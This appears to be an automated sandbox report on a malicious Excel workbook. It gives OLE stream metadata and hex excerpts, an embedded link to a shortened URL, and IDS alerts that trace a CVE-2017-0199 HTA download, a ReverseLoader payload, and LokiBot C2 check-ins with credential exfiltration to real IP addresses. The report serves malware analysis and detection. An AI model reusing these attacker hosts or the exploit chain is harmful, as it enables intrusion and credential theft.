Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

Stream Path: MBD000EE996/MBD00032B6D/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 95624

General
Stream Path:	MBD000EE996/MBD00032B6D/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	95624
Entropy:	3.890268972586762
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q \| 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD000EE996/MBD00033186/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD000EE996/MBD00033186/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD00033186/Package, File Type: Microsoft Excel 2007+, Stream Size: 52190

General
Stream Path:	MBD000EE996/MBD00033186/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	52190
Entropy:	7.870757596146126
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD0018D4CE/\x1Ole, File Type: data, Stream Size: 20

General
Stream Path:	MBD000EE996/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/MBD0018D4CE/\x3ObjInfo, File Type: data, Stream Size: 4

General
Stream Path:	MBD000EE996/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

Stream Path: MBD000EE996/MBD0018D4CE/Contents, File Type: Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c, Stream Size: 197671

General
Stream Path:	MBD000EE996/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000EE996/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 212905

General
Stream Path:	MBD000EE996/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	212905
Entropy:	7.612848324441619
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . ` < x - 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD000EE997/\x1Ole, File Type: data, Stream Size: 826

General
Stream Path:	MBD000EE997/\x1Ole
CLSID:
File Type:	data
Stream Size:	826
Entropy:	5.436920341033941
Base64 Encoded:	False
Data ASCII:	. . . . ! ! 0 \| . . . . . . . . . . . . . . . . . y . . . K . . . . . h . t . t . p . s . : . / . / . q . r . i . s . n . i . . . m . e . / . g . t . L . s . 6 . A . ? . & . v . o . l . c . a . n . o . = . w . e . t . & . m . u . s . c . l . e . = . c . h . i . l . l . y . & . r . e . s . u . l . t . = . s . a . l . t . y . & . p . e . r . f . u . m . e . = . j . a . z . z . y . & . k . n . i . c . k . e . r . s . = . d . e . p . r . e . s . s . e . d . & . w . a . l . k . = . s . l . o . p . p . y . & . j
Data Raw:	01 00 00 02 af f2 21 21 99 30 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 06 02 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 02 02 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 71 00 72 00 69 00 73 00 6e 00 69 00 2e 00 6d 00 65 00 2f 00 67 00 74 00 4c 00 73 00 36 00 41 00 3f 00 26 00 76 00 6f 00 6c 00 63 00 61 00 6e 00 6f 00 3d 00 77 00 65 00 74 00 26 00 6d 00 75 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 312403

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	312403
Entropy:	7.99853674566526
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . \| B . . . $ t . = m z @ u t . , y o U 1 } . . . . . . . . . . . . \\ . p . . . C ; H N % . e s . . . T , . . B + c " . " [ . h . b . . x . . . ` ^ G . [ . . . ! h ' > . \| h \\ Q ~ . P * ' . y . l A P B . . . . a . . . . . . = . . . . 6 } . . . b R 6 6 . y & W ] . . . . . . . . . . . . . . . . . . . . . . e . . . c = . . . z B . . O . 2 < # @ . . . % . . . " . . . ' Q . . . . 3 . . . . . . . 1 . . . [ G @ n H . . . . \| f a . . c ; . ] . 1 . . . # 5 7 l
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 c5 b4 7c 42 9f c5 05 de c5 b7 de 99 ec 24 9c fb c0 8c c4 d2 de 74 1b 3d 6d 7a ba c0 40 a6 75 74 1a 2c 79 b3 d5 d9 6f e5 cb 55 8a 31 7d f9 05 06 e1 00 02 00 b0 04 c1 00 02 00 b3 98 e2 00 00 00 5c 00 70 00 be c3 ff 10 14 43 a2 97 be 3b 9a 48 4e 25 16 9f 88 cd 65 c4 fc e5 73 80 1d 0d 15 9d 54 2c

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 523

General
Stream Path:	_VBA_PROJECT_CUR/PROJECT
CLSID:
File Type:	ASCII text, with CRLF line terminators
Stream Size:	523
Entropy:	5.2240749270485995
Base64 Encoded:	True
Data ASCII:	I D = " { E A 7 0 6 E C C - D C 7 9 - 4 D 1 4 - 9 9 F 2 - F C D E C A B F 0 B 2 3 } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 0 5 0 7 4 8 D F 5 8 6 E 5 C 6 E 5
Data Raw:	49 44 3d 22 7b 45 41 37 30 36 45 43 43 2d 44 43 37 39 2d 34 44 31 34 2d 39 39 46 32 2d 46 43 44 45 43 41 42 46 30 42 32 33 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 104

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2644

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	3.989914272190416
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00

Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 553

General
Stream Path:	_VBA_PROJECT_CUR/VBA/dir
CLSID:
File Type:	data
Stream Size:	553
Entropy:	6.371399438846861
Base64 Encoded:	True
Data ASCII:	. % . . . . . . . . 0 * . . . . p . . H . . . . d . . . . . . . V B A P r o j e c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . f - i . . . . J < . . . . . r s t d o l e > . . . s . t . d . o . l . e . . . h . % . ^ . . * \\ G { 0 0 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . E O f f D i c E O . f . i . c E . . E . 2 D F 8 D 0 4 C . - 5 B F A - 1 0 1 B - B D E 5 E A A C 4 . 2
Data Raw:	01 25 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e4 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 ea 66 2d 69 08 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-25T19:50:44.185312+0200	2858295	ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)	1	192.3.176.141	80	192.168.2.22	49175	TCP
2024-10-25T19:50:46.487655+0200	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49164	192.3.176.141	80	TCP
2024-10-25T19:50:46.487667+0200	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.176.141	80	192.168.2.22	49164	TCP
2024-10-25T19:50:49.146373+0200	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49166	192.3.176.141	80	TCP
2024-10-25T19:50:49.146379+0200	2024197	ET EXPLOIT MSXMLHTTP Download of HTA (Observed in CVE-2017-0199)	1	192.3.176.141	80	192.168.2.22	49166	TCP
2024-10-25T19:51:08.991349+0200	2024449	ET EXPLOIT SUSPICIOUS Possible CVE-2017-0199 IE7/NoCookie/Referer HTA dl	1	192.168.2.22	49171	192.3.176.141	80	TCP
2024-10-25T19:51:09.880866+0200	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.22	49170	192.3.176.141	80	TCP
2024-10-25T19:51:14.806501+0200	2858795	ETPRO MALWARE ReverseLoader Payload Request (GET) M2	1	192.168.2.22	49172	192.3.176.141	80	TCP
2024-10-25T19:51:33.195456+0200	2049038	ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2	1	142.250.186.161	443	192.168.2.22	49174	TCP
2024-10-25T19:51:50.145221+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:50.145221+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:50.145221+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:51.113562+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49176	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:51.616427+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:52.585611+0200	2024312	ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1	1	192.168.2.22	49177	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:52.671652+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.648713+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.648713+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49178	94.156.177.220	80	TCP
2024-10-25T19:51:53.654785+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49178	TCP
2024-10-25T19:51:53.908424+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:53.908424+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:53.908424+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.136616+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.136616+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49179	94.156.177.220	80	TCP
2024-10-25T19:51:55.136764+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49179	TCP
2024-10-25T19:51:55.330639+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:55.330639+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:55.330639+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.284539+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.284539+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49180	94.156.177.220	80	TCP
2024-10-25T19:51:56.315085+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49180	TCP
2024-10-25T19:51:56.433699+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:56.433699+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:56.433699+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.409276+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.409276+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49181	94.156.177.220	80	TCP
2024-10-25T19:51:57.420554+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49181	TCP
2024-10-25T19:51:57.559759+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:57.559759+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:57.559759+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:58.522256+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:58.522256+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49182	94.156.177.220	80	TCP
2024-10-25T19:51:58.528171+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49182	TCP
2024-10-25T19:51:59.256821+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:51:59.256821+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:51:59.256821+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.220924+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.220924+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49183	94.156.177.220	80	TCP
2024-10-25T19:52:00.226865+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49183	TCP
2024-10-25T19:52:00.374097+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:00.374097+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:00.374097+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.346125+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.346125+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49184	94.156.177.220	80	TCP
2024-10-25T19:52:01.352272+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49184	TCP
2024-10-25T19:52:01.495590+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:01.495590+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:01.495590+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.484796+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.484796+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49185	94.156.177.220	80	TCP
2024-10-25T19:52:02.491875+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49185	TCP
2024-10-25T19:52:02.924655+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:02.924655+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:02.924655+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:03.891131+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:03.891131+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49186	94.156.177.220	80	TCP
2024-10-25T19:52:03.896823+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49186	TCP
2024-10-25T19:52:04.043801+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:04.043801+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:04.043801+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.006829+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.006829+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49187	94.156.177.220	80	TCP
2024-10-25T19:52:05.014452+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49187	TCP
2024-10-25T19:52:05.183331+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:05.183331+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:05.183331+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.185045+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.185045+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49188	94.156.177.220	80	TCP
2024-10-25T19:52:06.190968+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49188	TCP
2024-10-25T19:52:06.351136+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:06.351136+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:06.351136+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.664194+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.664194+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.22	49189	94.156.177.220	80	TCP
2024-10-25T19:52:07.664910+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	94.156.177.220	80	192.168.2.22	49189	TCP
2024-10-25T19:52:07.823914+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:07.823914+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.22	49190	94.156.177.220	80	TCP
2024-10-25T19:52:07.823914+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.22	49190	94.156.177.220	80	TCP
